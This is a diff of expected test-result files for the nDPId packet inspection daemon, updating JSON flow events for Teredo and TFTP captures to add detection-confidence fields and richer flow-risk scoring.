 00593{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"teredo.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1438853632766,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":151,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":151,"pkt_l4_len":117,"ts_msec":1438853632766,"pkt":"ABsXAAEVbEFqjICJCABFAACJMcIAAHIRHR7CiBxMCnAQQA3Y21oAdWZ0AAEAABh7537NjT4KAAAAJKVG+T9GYAAAAAAwOv\/+gAAAAAAAAIAA8ic9d+Oz\/oAAAAAAAAAAAP\/\/\/\/\/\/\/oYARiEAAAAAAAA6mAAAB9ADBEBA\/\/\/\/\/\/\/\/\/\/8AAAAAIAEAAMKIHEy6FgeABnFWlQ=="}
 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"teredo.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1438853633749,"flow_last_seen":1438853633749,"flow_idle_time":180000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1438853633749,"l3_proto":"ip4","src_ip":"10.112.16.67","dst_ip":"194.136.28.76","src_port":51812,"dst_port":3544,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"teredo.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1438853633749,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":94,"pkt_l4_len":60,"ts_msec":1438853633749,"pkt":"bEFqjICJABsXAAEVCABFAABQa1QAAH4R18EKcBBDwogcTMpkDdgAPJPWYAAAAAAMOhUgAQAAwogcTCDzNZtG+T9GIALCiBxMAAAAAAAAwogcTYAA6wgo8LJvAAAAAA=="}
-00606{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"teredo.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1438853633749,"flow_last_seen":1438853633749,"flow_idle_time":180000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1438853633749,"l3_proto":"ip4","src_ip":"10.112.16.67","dst_ip":"194.136.28.76","src_port":51812,"dst_port":3544,"l4_proto":"udp","ndpi": {"proto":"Teredo","breed":"Acceptable","category":"Network"}}
+00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"teredo.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1438853633749,"flow_last_seen":1438853633749,"flow_idle_time":180000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1438853633749,"l3_proto":"ip4","src_ip":"10.112.16.67","dst_ip":"194.136.28.76","src_port":51812,"dst_port":3544,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Teredo","breed":"Acceptable","category":"Network"}}
 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"teredo.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1438853633749,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"ts_msec":1438853633749,"pkt":"bEFqjICJABsXAAEVCABFAABRa1UAAH4R178KcBBDwogcTMpkDdgAPZLqYAAAAAANOv8gAQAAwogcTCDzNZtG+T9GIALCiBxMAAAAAAAAwogcTIAAbVcAAQaF2tytrco="}
 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"teredo.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1438853633803,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"ts_msec":1438853633803,"pkt":"ABsXAAEVbEFqjICJCABFAABRMcMAAHIRHVLCiBxMCnAQQw3YymQAPZNqYAAAAAANOn8gAsKIHEwAAAAAAADCiBxMIAEAAMKIHEwg8zWbRvk\/RoEAbFcAAQaF2tytrco="}
 00520{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"teredo.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1438853653349,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":103,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":103,"pkt_l4_len":69,"ts_msec":1438853653349,"pkt":"bEFqjICJABsXAAEVCABFAABZW7oAAH4R5ysKcBBqwogcTM0hDdgARX2HAAEAALEbP+pGqa\/pAGAAAAAACDr\/\/oAAAAAAAAAAAP\/\/\/\/\/\/\/v8CAAAAAAAAAAAAAAAAAAKFAH04AAAAAA=="}
-00648{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24,"source":"teredo.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1438853633749,"flow_last_seen":1438853651224,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1438853653403,"l3_proto":"ip4","src_ip":"10.112.16.67","dst_ip":"194.136.28.76","src_port":51812,"dst_port":3544,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Teredo","breed":"Acceptable","category":"Network"}}
-00648{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24,"source":"teredo.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1438853632713,"flow_last_seen":1438853632766,"flow_idle_time":180000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":170,"flow_avg_l4_payload_len":85,"midstream":0,"ts_msec":1438853653403,"l3_proto":"ip4","src_ip":"10.112.16.64","dst_ip":"194.136.28.76","src_port":56154,"dst_port":3544,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Teredo","breed":"Acceptable","category":"Network"}}
-00648{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24,"source":"teredo.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1438853619792,"flow_last_seen":1438853619844,"flow_idle_time":180000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":170,"flow_avg_l4_payload_len":85,"midstream":0,"ts_msec":1438853653403,"l3_proto":"ip4","src_ip":"10.112.16.89","dst_ip":"194.136.28.76","src_port":60381,"dst_port":3544,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Teredo","breed":"Acceptable","category":"Network"}}
-00649{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24,"source":"teredo.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1438853615305,"flow_last_seen":1438853653403,"flow_idle_time":180000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":340,"flow_avg_l4_payload_len":85,"midstream":0,"ts_msec":1438853653403,"l3_proto":"ip4","src_ip":"10.112.16.106","dst_ip":"194.136.28.76","src_port":52513,"dst_port":3544,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Teredo","breed":"Acceptable","category":"Network"}}
-00648{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24,"source":"teredo.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1438853629357,"flow_last_seen":1438853629411,"flow_idle_time":180000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":170,"flow_avg_l4_payload_len":85,"midstream":0,"ts_msec":1438853653403,"l3_proto":"ip4","src_ip":"10.112.16.92","dst_ip":"194.136.28.76","src_port":63448,"dst_port":3544,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Teredo","breed":"Acceptable","category":"Network"}}
+00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24,"source":"teredo.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1438853633749,"flow_last_seen":1438853651224,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1438853653403,"l3_proto":"ip4","src_ip":"10.112.16.67","dst_ip":"194.136.28.76","src_port":51812,"dst_port":3544,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Teredo","breed":"Acceptable","category":"Network"}}
+00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24,"source":"teredo.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1438853632713,"flow_last_seen":1438853632766,"flow_idle_time":180000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":170,"flow_avg_l4_payload_len":85,"midstream":0,"ts_msec":1438853653403,"l3_proto":"ip4","src_ip":"10.112.16.64","dst_ip":"194.136.28.76","src_port":56154,"dst_port":3544,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Teredo","breed":"Acceptable","category":"Network"}}
+00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24,"source":"teredo.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1438853619792,"flow_last_seen":1438853619844,"flow_idle_time":180000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":170,"flow_avg_l4_payload_len":85,"midstream":0,"ts_msec":1438853653403,"l3_proto":"ip4","src_ip":"10.112.16.89","dst_ip":"194.136.28.76","src_port":60381,"dst_port":3544,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Teredo","breed":"Acceptable","category":"Network"}}
+00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24,"source":"teredo.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1438853615305,"flow_last_seen":1438853653403,"flow_idle_time":180000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":340,"flow_avg_l4_payload_len":85,"midstream":0,"ts_msec":1438853653403,"l3_proto":"ip4","src_ip":"10.112.16.106","dst_ip":"194.136.28.76","src_port":52513,"dst_port":3544,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Teredo","breed":"Acceptable","category":"Network"}}
+00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24,"source":"teredo.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1438853629357,"flow_last_seen":1438853629411,"flow_idle_time":180000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":170,"flow_avg_l4_payload_len":85,"midstream":0,"ts_msec":1438853653403,"l3_proto":"ip4","src_ip":"10.112.16.92","dst_ip":"194.136.28.76","src_port":63448,"dst_port":3544,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Teredo","breed":"Acceptable","category":"Network"}}
 00155{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":24,"source":"teredo.pcap","alias":"nDPId-test","total-events-serialized":29}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 24/24
@@ -35,10 +35,10 @@
 ~~ total active/idle flows...: 5/5
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4600325 bytes
-~~ total memory freed........: 4600325 bytes
-~~ total allocations/frees...: 99589/99589
+~~ total memory allocated....: 4683966 bytes
+~~ total memory freed........: 4683966 bytes
+~~ total allocations/frees...: 101179/101179
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 160 chars
-~~ json string max len.......: 654 chars
-~~ json string avg len.......: 477 chars
+~~ json string max len.......: 680 chars
+~~ json string avg len.......: 490 chars
diff --git a/test/results/tftp.pcap.out b/test/results/tftp.pcap.out
index 86cf6bebd..370cdf5be 100644
--- a/test/results/tftp.pcap.out
+++ b/test/results/tftp.pcap.out
@@ -1,24 +1,24 @@
 00436{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"tftp.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"tftp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1367411051972,"flow_last_seen":1367411051972,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"ts_msec":1367411051972,"l3_proto":"ip4","src_ip":"192.168.0.253","dst_ip":"192.168.0.10","src_port":50618,"dst_port":69,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"tftp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1367411051972,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1367411051972,"pkt":"AFCN14tDAAu+GJpACABFAAAwAAAAAP8ROWXAqAD9wKgACsW6AEUAHD4gAAFyZmMxMzUwLnR4dABvY3RldAA="}
-00605{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"tftp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1367411051972,"flow_last_seen":1367411051972,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"ts_msec":1367411051972,"l3_proto":"ip4","src_ip":"192.168.0.253","dst_ip":"192.168.0.10","src_port":50618,"dst_port":69,"l4_proto":"udp","ndpi": {"proto":"TFTP","breed":"Acceptable","category":"DataTransfer"}}
+00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"tftp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1367411051972,"flow_last_seen":1367411051972,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"ts_msec":1367411051972,"l3_proto":"ip4","src_ip":"192.168.0.253","dst_ip":"192.168.0.10","src_port":50618,"dst_port":69,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"TFTP","breed":"Acceptable","category":"DataTransfer"}}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"tftp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1367411052077,"flow_last_seen":1367411052077,"flow_idle_time":180000,"flow_min_l4_payload_len":516,"flow_max_l4_payload_len":516,"flow_tot_l4_payload_len":516,"flow_avg_l4_payload_len":516,"midstream":0,"ts_msec":1367411052077,"l3_proto":"ip4","src_ip":"192.168.0.10","dst_ip":"192.168.0.253","src_port":3445,"dst_port":50618,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01113{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"tftp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1367411052077,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":558,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":558,"pkt_l4_len":524,"ts_msec":1367411052077,"pkt":"AAu+GJpAAFCN14tDCABFAAIgkyUAAIARI1DAqAAKwKgA\/Q11xboCDNSjAAMAAQoKCgoKCk5ldHdvcmsgV29ya2luZyBHcm91cCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSy4gU29sbGlucwpSZXF1ZXN0IEZvciBDb21tZW50czogMTM1MCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNSVQKU1REOiAzMyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSnVseSAxOTkyCk9ic29sZXRlczogUkZDIDc4MwoKCiAgICAgICAgICAgICAgICAgICAgIFRIRSBURlRQIFBST1RPQ09MIChSRVZJU0lPTiAyKQoKU3RhdHVzIG9mIHRoaXMgTWVtbwoKICAgVGhpcyBSRkMgc3BlY2lmaWVzIGFuIElBQiBzdGFuZGFyZHMgdHJhY2sgcHJvdG9jb2wgZm9yIHRoZSBJbnRlcm5ldAogICBjb21tdW5pdHksIGFuZCByZXF1ZXN0cyBkaXNjdXNzaW9uIGFuZCBzdWdnZXN0aW9ucyBmb3IgaW1wcm92ZW1lbnRzLgogICBQbGVhc2UgcmVmZXIgdG8gdGhlIGN1cnJlbnQgZWRpdGlvbiBvZiB0aGUgIklB"}
 00445{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"tftp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1367411052081,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":12,"ts_msec":1367411052081,"pkt":"AFCN14tDAAu+GJpACABFAAAgAAEAAP8ROXTAqAD9wKgACsW6DXUADKpJAAQAAQAAAAAAAAAAAAAAAAAA"}
 01113{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"tftp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1367411052086,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":558,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":558,"pkt_l4_len":524,"ts_msec":1367411052086,"pkt":"AAu+GJpAAFCN14tDCABFAAIgkycAAIARI07AqAAKwKgA\/Q11xboCDOXlAAMAAkIgT2ZmaWNpYWwgUHJvdG9jb2wKICAgU3RhbmRhcmRzIiBmb3IgdGhlIHN0YW5kYXJkaXphdGlvbiBzdGF0ZSBhbmQgc3RhdHVzIG9mIHRoaXMgcHJvdG9jb2wuCiAgIERpc3RyaWJ1dGlvbiBvZiB0aGlzIG1lbW8gaXMgdW5saW1pdGVkLgoKU3VtbWFyeQoKICAgVEZUUCBpcyBhIHZlcnkgc2ltcGxlIHByb3RvY29sIHVzZWQgdG8gdHJhbnNmZXIgZmlsZXMuICBJdCBpcyBmcm9tCiAgIHRoaXMgdGhhdCBpdHMgbmFtZSBjb21lcywgVHJpdmlhbCBGaWxlIFRyYW5zZmVyIFByb3RvY29sIG9yIFRGVFAuCiAgIEVhY2ggbm9udGVybWluYWwgcGFja2V0IGlzIGFja25vd2xlZGdlZCBzZXBhcmF0ZWx5LiAgVGhpcyBkb2N1bWVudAogICBkZXNjcmliZXMgdGhlIHByb3RvY29sIGFuZCBpdHMgdHlwZXMgb2YgcGFja2V0cy4gIFRoZSBkb2N1bWVudCBhbHNvCiAgIGV4cGxhaW5zIHRoZSByZWFzb25zIGJlaGluZCBzb21lIG9mIHRoZSBkZXNpZ24gZGVjaXNpb25zLgoKQWNrbm93bGVnZW1lbnRzCgogICBUaGUg"}
-00667{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"tftp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1367411052077,"flow_last_seen":1367411052088,"flow_idle_time":180000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":516,"flow_tot_l4_payload_len":1040,"flow_avg_l4_payload_len":260,"midstream":0,"ts_msec":1367411052088,"l3_proto":"ip4","src_ip":"192.168.0.10","dst_ip":"192.168.0.253","src_port":3445,"dst_port":50618,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"TFTP","breed":"Acceptable","category":"DataTransfer"}}
-00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"tftp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":98,"flow_first_seen":1367411052077,"flow_last_seen":1367411052258,"flow_idle_time":180000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":516,"flow_tot_l4_payload_len":24991,"flow_avg_l4_payload_len":255,"midstream":0,"ts_msec":1626968644630,"l3_proto":"ip4","src_ip":"192.168.0.10","dst_ip":"192.168.0.253","src_port":3445,"dst_port":50618,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"TFTP","breed":"Acceptable","category":"DataTransfer"}}
-00646{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"tftp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1367411051972,"flow_last_seen":1367411051972,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"ts_msec":1626968644630,"l3_proto":"ip4","src_ip":"192.168.0.253","dst_ip":"192.168.0.10","src_port":50618,"dst_port":69,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TFTP","breed":"Acceptable","category":"DataTransfer"}}
+00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"tftp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1367411052077,"flow_last_seen":1367411052088,"flow_idle_time":180000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":516,"flow_tot_l4_payload_len":1040,"flow_avg_l4_payload_len":260,"midstream":0,"ts_msec":1367411052088,"l3_proto":"ip4","src_ip":"192.168.0.10","dst_ip":"192.168.0.253","src_port":3445,"dst_port":50618,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TFTP","breed":"Acceptable","category":"DataTransfer"}}
+00819{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"tftp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":98,"flow_first_seen":1367411052077,"flow_last_seen":1367411052258,"flow_idle_time":180000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":516,"flow_tot_l4_payload_len":24991,"flow_avg_l4_payload_len":255,"midstream":0,"ts_msec":1626968644630,"l3_proto":"ip4","src_ip":"192.168.0.10","dst_ip":"192.168.0.253","src_port":3445,"dst_port":50618,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TFTP","breed":"Acceptable","category":"DataTransfer"}}
+00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"tftp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1367411051972,"flow_last_seen":1367411051972,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"ts_msec":1626968644630,"l3_proto":"ip4","src_ip":"192.168.0.253","dst_ip":"192.168.0.10","src_port":50618,"dst_port":69,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TFTP","breed":"Acceptable","category":"DataTransfer"}}
 00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":100,"source":"tftp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626968644630,"flow_last_seen":1626968644630,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"ts_msec":1626968644630,"l3_proto":"ip4","src_ip":"172.28.5.91","dst_ip":"172.28.5.170","src_port":44618,"dst_port":69,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":100,"source":"tftp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1626968644630,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"ts_msec":1626968644630,"pkt":"eCSvPj0DAFBWn8+KCABFAAAuYudAAEARdJqsHAVbrBwFqq5KAEUAGkfgAAJ6ei5iaW4AbmV0YXNjaWkA"}
-00605{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":100,"source":"tftp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626968644630,"flow_last_seen":1626968644630,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"ts_msec":1626968644630,"l3_proto":"ip4","src_ip":"172.28.5.91","dst_ip":"172.28.5.170","src_port":44618,"dst_port":69,"l4_proto":"udp","ndpi": {"proto":"TFTP","breed":"Acceptable","category":"DataTransfer"}}
+00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":100,"source":"tftp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626968644630,"flow_last_seen":1626968644630,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"ts_msec":1626968644630,"l3_proto":"ip4","src_ip":"172.28.5.91","dst_ip":"172.28.5.170","src_port":44618,"dst_port":69,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"TFTP","breed":"Acceptable","category":"DataTransfer"}}
 00566{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":101,"source":"tftp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626968644631,"flow_last_seen":1626968644631,"flow_idle_time":180000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":0,"ts_msec":1626968644631,"l3_proto":"ip4","src_ip":"172.28.5.170","dst_ip":"172.28.5.91","src_port":62058,"dst_port":44618,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00432{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":101,"source":"tftp.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1626968644631,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":46,"pkt_l4_len":12,"ts_msec":1626968644631,"pkt":"AFBWn8+KeCSvPj0DCABFAAAgqt8AAEARbLCsHAWqrBwFW\/JqrkoADPveAAQAAA=="}
